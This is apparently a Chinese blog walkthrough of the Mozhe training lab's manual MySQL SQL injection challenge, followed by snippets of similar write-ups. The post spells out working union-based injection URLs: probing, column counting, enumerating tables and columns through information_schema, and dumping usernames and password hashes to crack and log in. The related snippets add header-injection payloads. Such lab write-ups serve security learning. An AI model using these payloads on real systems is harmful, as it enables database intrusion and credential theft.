【墨者学院SQL手工注入漏洞测试(MySQL数据库)】

已于 2023-03-18 17:04:32 修改
阅读量230 收藏
点赞数 1
文章标签: 网络安全 mysql Powered by 金山文档
于 2023-03-18 14:02:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/guobeiwei/article/details/129634011
版权

靶场地址 在线靶场_墨者学院 (mozhe.cn)

启动靶场  观察是否存在入住点  点击进入登陆下面可能存在注入的页面地址

进入后获得以下页面 发现 ?id=1 

运用sql语句 在?id=1后面添加and 1=1 页面正常 and 1=2 页面返回错误 可能存在注入点

运用 order by x 猜列名字段数量 看里面有多少个  

从order by 1 猜测到 order by 5时页面错误 输入order by 4时页面正常 从此可以判定该表列数为4 

获得到表的列数后 运用 union 语句进行猜解 让页面报错 显示出数字 

可以在id=1 后面添加 and 1=2 或者id=1添加一个负号

http://124.70.22.208:48188/new_list.php?id=-1 union select 1,2,3,4

http://124.70.22.208:48188/new_list.php?id=1 and 1=2 union select 1,2,3,4

经以上操作报出数字2 3 这时候就可以在 2和3的位置进行相关的数据查询

查询数据库名字 数据库版本 将database()和version()带入 2,3中

http://124.70.22.208:48188/new_list.php?id=-1 union select 1,database(),version(),4 

获得数据库名字为:mozhe_Discuz_StormGroup

数据库版本:5.7.22-0ubuntu0.16.04.1

数据库版本为5.7.22-0ubuntu0.16.04.1 在该版本的数据库中mysql存在一个自带的数据库名为information_schema里面含有数据库名 表名 列名 可以用 information_schema进行有据查询

从而可以通过查询它获得名为 mozhe_Discuz_StormGroup数据库中的表名 列名信息

mysql5.0以下:不存在information_schema数据库

mysql5.0以上:存在information_schema数据库

查询mozhe_Discuz_StormGroup下的所有表名信息 获得StormGroup_member 和 通知

http://124.70.22.208:48188/new_list.php?id=-1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup' 

查到表名为:StormGroup_member 

进行查询StormGroup_member 表名下面的列名信息

http://124.70.22.208:48188/new_list.php?id=-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='StormGroup_member'

查询StormGroup_member中的 用户名 密码

http://124.70.22.208:48188/new_list.php?id=-1 union select 1,name,password,4 from StormGroup_member

用户名:mozhe

如果有多个密码就在后面加上 limit 0,1 显示第一个 limit 1,1 显示第二个

找到一个可以白票的网站进行md5解密 获得密码 最后输入密码登陆即可

锅锅锅.
关注
墨者SQL手工注入漏洞测试(MySQL数据库)思路
weixin_50847719的博客
01-22 610
师从小迪,刚看完sql注入,印象最深刻就是小迪师傅到第四天了打火机依旧没油,咔嚓咔嚓打不着火 进入 寻找注入点 看这 http://219.153.49.228:47589/new_list.php?id=1 判断注入,老办法and 1 = 1和and 1=2 http://219.153.49.228:47589/new_list.php?id=1%20and%201=2 下面该数据库有几个字段(列名数量) order by x id=1 order by x http://219.153.
墨者学院—— SQL手工注入漏洞测试(MySQL数据库-字符型)
Lollipop_zhi的博客
02-26 2279
1.启动靶场环境,老地方点击 2.看地址栏,合理怀疑是否有注入点 这里插入知识点——怎么判断有注入点? 一般方法: and 1=1 正常 and 1=2 错误 背后的原理是逻辑运算 真且真=真;真且假=假 所以只需要让它能判断出假,就可以合理怀疑存在注入点 比如:id=jhfjkashlk(瞎打的) 改成 id=jhdak 显示异常,有注入点 3.尝试简单使用order by 猜解列名数量,不成功 order by 之后我才判断了单引号闭合,也就是id=tingjigon
针对mysqlsql注入漏洞测试(MySql版)
白瞳洛的博客
08-11 657
我们先来判断下这个表中有几个字段使用 order by1以上的,如果说页面不正常了,肯定就超过这个数了,比如我们使用6来。6报错那就表述这个字段只有5个了。 id=1 order by 6# id=1-1 union select 1,2,3,4,5#--下面获取每个字段 我们换成user(),@@version数据库版本,database()当前使用的数据库,@@basedirmysql的安装路径,随后会返回一些敏感信息 id=1-1 union select user(),@@v...
MYSQL HTTP头部注入
AaronLuo
09-06 595
HTTP头部基础 Accept : 浏览器能够处理的内容类型 Accept-Charset : 浏览器能够显示的字符集 Accept-Encoding : 浏览器能处理的压缩编码 Accept-Language : 浏览器当前设置的语言 Connection : 浏览器与服务器之间的连接 cookie : 当前页面设置的cookie Host : 发出请求的页面所在域 Referer : 发出请求...
SQL手工注入漏洞测试(MySQL数据库)
weixin_54227009的博客
12-15 959
SQL手工注入
OWASP-TOP10漏洞-注入漏洞
weixin_44770698的博客
09-14 1325
注入漏洞学习-墨者学院
墨者学院-SQL手工注入漏洞测试(MySQL数据库)
weixin_42939822的博客
03-16 3608
墨者学院-SQL手工注入漏洞测试(MySQL数据库)
墨者靶场-SQL手工注入漏洞测试(MySQL数据库-字符型)
weixin_46694260的博客
03-27 3968
0x00 前言 我们都知道,SQL注入分数字型和字符型,我们上次讲的是最基本的数字型SQL注入,这次我们就来讲最基本的字符型SQL注入。同样,如果是明白原理和方法的话,看懂这篇文章并不难,但是如果不清楚原理和方法的话…还是可以看的,大家多多给我点赞吧,哈哈哈哈哈,还是那句话,菜鸟一个,大佬勿喷~ 0x01 过程 首先,还是老样子,我们先看一下题目 这里通过题目我们知道,这次SQL注入是字符型的SQL注入 那我们就进入靶场环境 可以看到和上次一样,有一个登录系统,登录框下面有一个维护新闻轮播框 我们点进去
墨者靶场—SQL手工注入漏洞测试(MySQL数据库)
weixin_46694260的博客
03-23 7295
0x00 前言 学SQL注入也有一段时间了,找了一个在线靶场,这个题目基本上学会最基本的注入原理和方法都能拿下,废话就不多说了,直接来演示吧~菜鸟渗透,大佬勿喷 0x01 过程 首先我们先稍微看一下题目 通过题目我们可以看出靶场环境是Nginx+PHP+MySQL 那我们现在启动、进入靶场 ...
SQL注入漏洞测试(HTTP头注入)
qq_43370360的博客
07-01 2035
SQL注入漏洞测试(HTTP头注入) 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编辑器, 可以仔细阅读这篇文章,了解一下Markdown的基本语法知识。 新的改变 用burp抓包进入send to repeater 根据标题所示注入在http头:User-Agent,cookie,X_FORWARDED_FOR这三块地方 这题的注入点在h...
墨者学院--SQL注入漏洞测试(HTTP头注入)
Routine_limon的博客
07-19 931
这道题需要使用到Burp suite这个工具。先简单的说下使用步骤: 简述下4个按钮的作用: ①Forward的功能是当你查看过消息或者重新编辑过消息之后,点击此按钮,将发送消息至服务器端。 ②Drop的功能是你想丢失当前拦截的消息,不再forward到服务器端。 ③Interception is on表示拦截功能打开,拦截所有通过Burp Proxy的请求数据;Interception is ...
墨者 - SQL注入漏洞测试(HTTP头注入)
吃肉唐僧的博客
07-07 2543
手动判断注入点 判断字段 判断表名union select 1,2,3,(select group_concat(table_name) from information_schema.tables where table_schema=database...
墨者学院-SQL注入漏洞测试(HTTP头注入)
JimWu的博客
09-04 1306
SQL注入漏洞测试(HTTP头注入) 难易程度:★★ 题目类型:SQL注入 使用工具:FireFox浏览器、burpsuite 1.打开靶场,使用burpsuite访问网页,截包。 2.把包send to repeater,根据题目为host注入,把host改为or 1=1,报错,证明存在注入。 3.输入union select 1,2,3,4 查看回显位置。 4.输入union select...
在线靶场-墨者-SQL注入1星-SQL手工注入漏洞测试(MySQL数据库)
weixin_42079912的博客
07-18 2599
尝试在URL后,输入and 1=1显示正常,and 1=2显示不正常,判断此处存在SQL注入 order by 获取字段数为4 and 1=2 union select 1,2,3,4 发现2在原文Title处,3在content处 and 1=2 union select 1,version(),database(),4 爆库得到 and 1=2 union select 1,ve...
如何检测mysql注入漏洞_SQL注入漏洞检测
weixin_32027887的博客
01-27 3860
一个度过菜鸟期的后台程序员都会小心的避开SQL注入常见低级错误。除了白盒和代码评审,作为第三方的渗透测试,使用sqlmap这样的常用工具进行SQL注入扫描可以降低上述问题发生概率。工具环境准备0.先检查一下是否安装过sqlmap工具,显示下版本sqlmap --version如果运行成功说明已经安装此工具,比如返回1.1.6#pip如果没有安装过sqlmap,请参考后面两个步骤1.安装pip工具多...
墨者-sql手工注入漏洞测试
最新发布
04-29
墨者安全团队是一支专注于网络安全领域的团队,他们致力于网络安全研究...总的来说,墨者安全团队的手工注入漏洞测试方法比较系统和全面,可以有效地发现目标网站中存在的注入漏洞,从而帮助企业提高网络安全防护水平。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值